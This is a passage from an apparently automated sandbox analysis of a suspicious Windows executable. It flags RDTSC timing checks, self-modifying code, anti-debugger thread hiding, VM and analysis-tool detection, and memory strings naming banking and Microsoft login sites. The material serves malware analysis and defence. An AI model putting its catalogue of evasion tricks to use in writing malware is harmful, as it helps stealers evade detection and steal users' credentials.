                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 5300493 second address: 53004A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F029CDBDB06h 0x0000000e pushad 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 53004A5 second address: 530053B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F022C80053Dh 0x0000000a popad 0x0000000b mov ebx, dword ptr [ebp+08h] 0x0000000e jmp 00007F022C80053Eh 0x00000013 lea eax, dword ptr [ebp-2Ch] 0x00000016 jmp 00007F022C800540h 0x0000001b xchg eax, esi 0x0000001c jmp 00007F022C800540h 0x00000021 push eax 0x00000022 jmp 00007F022C80053Bh 0x00000027 xchg eax, esi 0x00000028 pushad 0x00000029 mov cx, 7D1Bh 0x0000002d mov edi, eax 0x0000002f popad 0x00000030 nop 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007F022C800548h 0x00000038 or esi, 6569E918h 0x0000003e jmp 00007F022C80053Bh 0x00000043 popfd 0x00000044 mov cx, 68CFh 0x00000048 popad 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d push esi 0x0000004e pop ebx 0x0000004f popad 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 530053B second address: 530058E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022CCCFB16h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b mov edx, eax 0x0000000d pushfd 0x0000000e jmp 00007F022CCCFB0Ah 0x00000013 or si, 6DD8h 0x00000018 jmp 00007F022CCCFB0Bh 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F022CCCFB15h 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 530058E second address: 5300594 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 5300594 second address: 5300598 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 530062B second address: 5300635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, 3EC94164h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 5300635 second address: 530063B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 530063B second address: 530063F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 530063F second address: 52F0E92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022CCCFB14h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F029CDBDB02h 0x00000011 xor eax, eax 0x00000013 jmp 00007F022CCA923Ah 0x00000018 pop esi 0x00000019 pop edi 0x0000001a pop ebx 0x0000001b leave 0x0000001c retn 0004h 0x0000001f nop 0x00000020 xor ebx, ebx 0x00000022 cmp eax, 00000000h 0x00000025 je 00007F022CCCFC63h 0x0000002b call 00007F023120DDBFh 0x00000030 mov edi, edi 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007F022CCCFB0Dh 0x00000039 or ch, 00000026h 0x0000003c jmp 00007F022CCCFB11h 0x00000041 popfd 0x00000042 pushad 0x00000043 push ecx 0x00000044 pop edx 0x00000045 pushfd 0x00000046 jmp 00007F022CCCFB0Ah 0x0000004b xor ecx, 5736FFC8h 0x00000051 jmp 00007F022CCCFB0Bh 0x00000056 popfd 0x00000057 popad 0x00000058 popad 0x00000059 xchg eax, ebp 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007F022CCCFB15h 0x00000061 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 52F0E92 second address: 52F0E98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 52F0E98 second address: 52F0E9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 52F0E9C second address: 52F0ECB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov ecx, 5B94CA3Bh 0x0000000f jmp 00007F022C800540h 0x00000014 popad 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F022C80053Ah 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 52F0ECB second address: 52F0EDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022CCCFB0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 52F0EDA second address: 52F0F75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movsx ebx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F022C80053Ch 0x00000012 xchg eax, ecx 0x00000013 jmp 00007F022C800540h 0x00000018 push eax 0x00000019 pushad 0x0000001a mov di, 91F4h 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F022C800543h 0x00000025 sbb cl, FFFFFF8Eh 0x00000028 jmp 00007F022C800549h 0x0000002d popfd 0x0000002e mov edx, eax 0x00000030 popad 0x00000031 popad 0x00000032 xchg eax, ecx 0x00000033 jmp 00007F022C80053Ah 0x00000038 mov dword ptr [ebp-04h], 55534552h 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 mov edi, 2915E620h 0x00000047 call 00007F022C800549h 0x0000004c pop esi 0x0000004d popad 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 5300AE6 second address: 5300B55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F022CCCFB0Fh 0x00000009 jmp 00007F022CCCFB13h 0x0000000e popfd 0x0000000f mov ah, A0h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 jmp 00007F022CCCFB12h 0x0000001a xchg eax, ebp 0x0000001b jmp 00007F022CCCFB10h 0x00000020 mov ebp, esp 0x00000022 jmp 00007F022CCCFB10h 0x00000027 cmp dword ptr [7544459Ch], 05h 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 5300B55 second address: 5300B72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022C800549h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 5300B72 second address: 5300B9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, 89h 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F029CDAD98Bh 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007F022CCCFB17h 0x00000016 mov ax, 078Fh 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 5300B9F second address: 5300BBF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022C800545h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 5300BBF second address: 5300BC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 5300BC3 second address: 5300BC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 5300BC7 second address: 5300BCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 5300C55 second address: 5300C78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022C80053Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F022C80053Eh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 5300D95 second address: 5300D9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 5300D9B second address: 5300D9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 5300D9F second address: 5300DFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022CCCFB19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test al, al 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F022CCCFB0Ch 0x00000014 and esi, 56A7EE18h 0x0000001a jmp 00007F022CCCFB0Bh 0x0000001f popfd 0x00000020 call 00007F022CCCFB18h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 5300DFA second address: 5300E0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 je 00007F029C8D40BBh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push esi 0x00000010 pop edi 0x00000011 mov bx, ax 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 5300E0F second address: 5300E3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022CCCFB11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp+08h], 00002000h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F022CCCFB0Dh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 5310B56 second address: 5310B66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F022C80053Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 5310B66 second address: 5310BC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F022CCCFB0Dh 0x00000011 or ch, 00000006h 0x00000014 jmp 00007F022CCCFB11h 0x00000019 popfd 0x0000001a pushad 0x0000001b mov eax, 3ABEB18Dh 0x00000020 call 00007F022CCCFB0Ah 0x00000025 pop eax 0x00000026 popad 0x00000027 popad 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F022CCCFB18h 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 5310BC4 second address: 5310BD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022C80053Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 5310BD3 second address: 5310C37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022CCCFB19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c jmp 00007F022CCCFB0Eh 0x00000011 mov esi, dword ptr [ebp+0Ch] 0x00000014 jmp 00007F022CCCFB10h 0x00000019 test esi, esi 0x0000001b jmp 00007F022CCCFB10h 0x00000020 je 00007F029CD9D297h 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 mov ecx, edi 0x0000002b mov edi, 6876E33Ch 0x00000030 popad 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 5310C37 second address: 5310C78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022C800542h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [7544459Ch], 05h 0x00000010 jmp 00007F022C800540h 0x00000015 je 00007F029C8E5D69h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F022C80053Ah 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 5310C78 second address: 5310C7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 5310C7E second address: 5310CCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F022C80053Ch 0x00000009 add ax, 0BE8h 0x0000000e jmp 00007F022C80053Bh 0x00000013 popfd 0x00000014 mov ecx, 6B3B57DFh 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, esi 0x0000001d jmp 00007F022C800542h 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F022C80053Eh 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: 5310CCB second address: 5310CD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\EI3TafelpV.exeSpecial instruction interceptor: First address: DD7DD8 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\EI3TafelpV.exeSpecial instruction interceptor: First address: F90EE0 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\EI3TafelpV.exeSpecial instruction interceptor: First address: DD7D1B instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\EI3TafelpV.exeSpecial instruction interceptor: First address: 100B5DE instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exe TID: 7604Thread sleep time: -36018s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exe TID: 7576Thread sleep time: -30015s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exe TID: 7680Thread sleep time: -300000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exe TID: 7580Thread sleep time: -40020s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\EI3TafelpV.exeLast function: Thread delayed
                Source: Amcache.hve.5.drBinary or memory string: VMware
                Source: EI3TafelpV.exe, 00000000.00000003.1514106635.0000000005B07000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696497155
                Source: EI3TafelpV.exe, 00000000.00000003.1514106635.0000000005B07000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: EI3TafelpV.exe, 00000000.00000002.2028252194.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1681208878.000000000113D000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1467791586.0000000001141000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1596674784.0000000001136000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000002.2028665716.000000000113E000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1758980695.000000000113D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: EI3TafelpV.exe, 00000000.00000003.1514106635.0000000005B07000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696497155
                Source: EI3TafelpV.exe, 00000000.00000003.1514106635.0000000005B07000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696497155x
                Source: EI3TafelpV.exe, 00000000.00000003.1514106635.0000000005B07000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                Source: EI3TafelpV.exe, 00000000.00000003.1514106635.0000000005B07000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                Source: EI3TafelpV.exe, 00000000.00000003.1514106635.0000000005B07000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
                Source: Amcache.hve.5.drBinary or memory string: vmci.sys
                Source: EI3TafelpV.exe, 00000000.00000003.1514106635.0000000005B07000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
                Source: EI3TafelpV.exe, 00000000.00000003.1514106635.0000000005B0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696497155p
                Source: EI3TafelpV.exe, 00000000.00000003.1514106635.0000000005B07000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
                Source: Amcache.hve.5.drBinary or memory string: VMware20,1
                Source: EI3TafelpV.exe, 00000000.00000003.1514106635.0000000005B07000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                Source: EI3TafelpV.exe, 00000000.00000003.1514106635.0000000005B07000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
                Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: EI3TafelpV.exe, 00000000.00000003.1514106635.0000000005B07000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696497155f
                Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: EI3TafelpV.exe, 00000000.00000003.1514106635.0000000005B07000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
                Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
                Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: EI3TafelpV.exe, 00000000.00000003.1514106635.0000000005B07000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                Source: EI3TafelpV.exe, 00000000.00000003.1514106635.0000000005B07000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696497155s
                Source: EI3TafelpV.exe, 00000000.00000003.1514106635.0000000005B07000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: EI3TafelpV.exe, 00000000.00000003.1514106635.0000000005B07000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696497155j
                Source: EI3TafelpV.exe, 00000000.00000002.2026930031.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: EI3TafelpV.exe, 00000000.00000003.1514106635.0000000005B07000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696497155t
                Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
                Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
                Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
                Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
                Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: EI3TafelpV.exe, 00000000.00000003.1514106635.0000000005B07000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
                Source: EI3TafelpV.exe, 00000000.00000003.1514106635.0000000005B07000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                Source: EI3TafelpV.exe, 00000000.00000003.1514106635.0000000005B07000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696497155o
                Source: EI3TafelpV.exe, 00000000.00000003.1514106635.0000000005B07000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: EI3TafelpV.exe, 00000000.00000003.1514106635.0000000005B07000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                Source: EI3TafelpV.exe, 00000000.00000003.1681208878.000000000113D000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1467791586.0000000001141000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1596674784.0000000001136000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000002.2028665716.000000000113E000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1758980695.000000000113D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW+lj
                Source: EI3TafelpV.exe, 00000000.00000003.1514106635.0000000005B07000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                Source: EI3TafelpV.exe, 00000000.00000003.1514106635.0000000005B07000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
                Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
                Source: EI3TafelpV.exe, 00000000.00000003.1514106635.0000000005B07000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696497155
                Source: EI3TafelpV.exe, 00000000.00000003.1514106635.0000000005B07000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696497155
                Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: EI3TafelpV.exe, 00000000.00000003.1514106635.0000000005B07000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                Source: Amcache.hve.5.drBinary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
                Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: EI3TafelpV.exe, 00000000.00000003.1514106635.0000000005B07000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696497155t
                Source: EI3TafelpV.exe, 00000000.00000002.2026930031.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: EI3TafelpV.exe, 00000000.00000003.1514106635.0000000005B07000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
                Source: EI3TafelpV.exe, 00000000.00000003.1514106635.0000000005B07000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                Source: C:\Users\user\Desktop\EI3TafelpV.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\EI3TafelpV.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\EI3TafelpV.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\EI3TafelpV.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\EI3TafelpV.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\EI3TafelpV.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\EI3TafelpV.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\EI3TafelpV.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\EI3TafelpV.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\EI3TafelpV.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: SICE
                Source: C:\Users\user\Desktop\EI3TafelpV.exeFile opened: SIWVID
